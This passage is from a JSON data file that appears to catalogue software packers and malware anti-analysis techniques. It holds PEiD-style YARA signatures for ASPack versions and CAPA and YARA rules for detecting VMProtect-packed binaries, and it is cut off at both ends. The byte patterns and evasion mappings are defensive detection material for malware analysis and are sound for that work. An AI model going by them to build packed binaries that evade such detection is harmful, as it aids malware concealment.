6E AD 43 00 00 75 15 FE 85 6E AD 43 00 E8 1D 00 00 00 E8 73 02 00 00 E8 0A 03 00 00 8B 85 70 AD 43 00 03 85 84 AD 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804: PEiD\r\n{\r\n    strings:\r\n        $a = { A8 03 61 75 08 B8 01 C2 0C 68 C3 8B 85 26 04 8D 8D 3B 04 51 50 FF }\r\n        $b = { 60 E8 41 06 00 00 EB 41 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v100b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_10801_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 ?? 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_101b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED D2 2A 44 00 B8 CC 2A 44 00 03 C5 2B 85 A5 2E 44 00 89 85 B1 2E 44 00 80 BD 9C 2E 44 00 00 75 15 FE 85 9C 2E 44 00 E8 1D 00 00 00 E8 E4 01 00 00 E8 7A 02 00 00 8B 85 9D 2E 44 00 03 85 B1 2E 44 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 41 06 00 00 EB 41 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_103b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED AE 98 43 00 B8 A8 98 43 00 03 C5 2B 85 18 9D 43 00 89 85 24 9D 43 00 80 BD 0E 9D 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_ASPack_2xx_Heuristic: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_1061b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED EA A8 43 00 B8 E4 A8 43 00 03 C5 2B 85 78 AD 43 00 89 85 84 AD 43 00 80 BD 6E AD 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v21_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 48 11 00 00 C3 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_106b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 ?? ?? EB }\r\n        $b = { 60 E8 70 05 00 00 EB 4C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v2001: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 ?? ?? EB 33 87 DB }\r\n        $b = { 60 E8 72 05 00 00 EB 4C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_211d_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? E8 0D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108x: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D BB 03 }\r\n        $b = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v1061b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED B8 03 C5 2B 85 0B DE 89 85 17 DE 80 BD 01 }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10801: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 44 BB 10 44 03 DD 2B }\r\n        $b = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10802: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 ?? BB 10 6A 44 ?? 03 DD 2B 9D }\r\n        $b = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10803: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 0A 4A 44 ?? BB 04 4A 44 ?? 03 }\r\n        $b = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_107b_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 3E D9 43 00 B8 38 D9 43 00 03 C5 2B 85 0B DE 43 00 89 85 17 DE 43 00 80 BD 01 DE 43 00 00 75 15 FE 85 01 DE 43 00 E8 1D 00 00 00 E8 79 02 00 00 E8 12 03 00 00 8B 85 03 DE 43 00 03 85 17 DE 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 F9 11 00 00 C3 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Hint_WIN_EP_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_212withouth_Poly_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10803_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v104b: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 ?? }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v105b: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 ?? }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_211d_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 3A 4D 3A 1E EB 02 CD 20 9C EB 02 CD 20 EB 02 CD 20 60 EB 02 C7 05 EB 02 CD 20 E8 03 00 00 00 E9 EB 04 58 40 50 C3 61 9D 1F EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 01 FF }\r\n        $b = { 90 75 01 FF E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 8A 1C 40 00 B9 9E 00 00 00 8D BD 4C 23 40 00 8B F7 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v106b: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 ?? }\r\n        $b = { 90 90 90 75 00 E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v104b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_V22_Alexey_Solodovnikov_StarForce_2009408: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD ?? ?? ?? ?? ?? ?? 83 BD 7D 04 00 00 00 89 9D 7D 04 00 00 0F 85 C0 03 00 00 8D 85 89 04 00 00 50 FF 95 09 0F 00 00 89 85 81 04 00 00 8B F0 8D 7D 51 57 56 FF 95 05 0F 00 00 AB B0 00 AE 75 FD 38 07 75 EE 8D 45 7A FF E0 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 56 69 72 74 75 61 6C 46 72 65 65 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 8B 9D 8D 05 00 00 0B DB 74 0A 8B 03 87 85 91 05 00 00 89 03 8D B5 BD 05 00 00 83 3E 00 0F 84 15 01 00 00 6A 04 68 00 10 00 00 68 00 18 00 00 6A 00 FF 55 51 89 85 53 01 00 00 8B 46 04 05 0E 01 00 00 6A 04 68 00 10 00 00 50 6A 00 FF 55 51 89 85 4F 01 00 00 56 8B 1E 03 9D 7D 04 00 00 FF B5 53 01 00 00 FF 76 04 50 53 E8 2D 05 00 00 B3 00 80 FB 00 75 5E FE 85 E9 00 00 00 8B 3E 03 BD 7D 04 00 00 FF 37 C6 07 C3 FF D7 8F 07 50 51 56 53 8B C8 83 E9 06 8B B5 4F 01 00 00 33 DB 0B C9 74 2E 78 2C AC 3C E8 74 0A EB 00 3C E9 74 04 43 49 EB EB 8B 06 EB 00 ?? ?? ?? 75 F3 24 00 C1 C0 18 2B C3 89 06 83 C3 05 83 C6 04 83 E9 05 EB CE 5B 5E 59 58 EB 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108x_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10801_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }\r\n        $b = { 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v100b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED D2 2A 44 B8 CC 2A 44 03 C5 2B 85 A5 2E 44 89 85 B1 2E 44 80 BD 9C 2E }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_102b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 2B 85 7D 7C 43 00 89 85 89 7C 43 00 80 BD 74 7C 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED 96 78 43 B8 90 78 43 03 C5 2B 85 7D 7C 43 89 85 89 7C 43 80 BD 74 7C }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v102b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 96 78 43 ?? B8 90 78 43 ?? 03 }\r\n        $b = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v108x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v105b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_211_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 3D 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_212b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB EC FF FF FF 03 DD 81 EB 00 ?? ?? 00 83 BD 22 04 00 00 00 89 9D 22 04 00 00 0F 85 65 03 00 00 8D 85 2E 04 00 00 50 FF 95 4C 0F 00 00 89 85 26 04 00 00 8B F8 8D 5D 5E 53 50 FF 95 48 0F 00 00 89 85 4C 05 00 00 8D 5D 6B 53 57 FF 95 48 0F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v1061b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_DLL_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 191,
            "unprotect_id": "U1410",
            "name": "VMProtect",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "VMProtect protects code by executing it on a virtual machine with non-standard architecture that makes it extremely difficult to analyze and crack the software. Besides that, VMProtect generates and verifies serial numbers, limits free upgrades and much more.",
            "resources": "https://vmpsoft.com/",
            "tags": "vmprotect",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 100,
                    "key": "capa_detect_vmprotect",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_vmprotect",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with VMProtect\r\n    namespace: anti-analysis/packer/vmprotect\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing::VMProtect [F0001.010]\r\n    references:\r\n      - https://www.pcworld.com/article/2824572/leaked-programming-manual-may-help-criminals-develop-more-atm-malware.html\r\n      - https://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/\r\n    examples:\r\n      - 971e599e6e707349eccea2fd4c8e5f67\r\n  features:\r\n    - or:\r\n      - string: \"A debugger has been found running in your system.\"\r\n      - string: \"Please, unload it from memory and restart your program.\"\r\n      - string: \"File corrupted!. This program has been manipulated and maybe\"\r\n      - string: \"it's infected by a Virus or cracked. This file won't work anymore.\"\r\n      - section: .vmp0\r\n      - section: .vmp1\r\n      - section: .vmp2"
                },
                {
                    "id": 108,
                    "key": "yara_detect_vmprotect",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_vmprotect",
                    "rule": "rule VMProtect_v125_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B 45 00 83 C5 02 66 8B 00 66 89 45 00 E9 A5 06 00 00 8B 45 00 66 8B 55 04 83 C5 06 66 89 10 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect246_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 60 C7 ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 60 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_v125_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 55 50 52 }\r\n        $b = { 8B 45 00 83 C5 02 66 8B 00 66 89 45 00 E9 A5 06 00 00 8B 45 00 66 8B 55 04 83 C5 06 66 89 10 E9 }\r\n        $c = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 06 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule VMProtect_07x_08_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_106107_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_V1X_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_0x_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_180_phpbb3: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? E8 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? A8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_V1X_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_1704_phpbb3: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? E8 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_0x_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 }\r\n    condition:\r\n        $a at 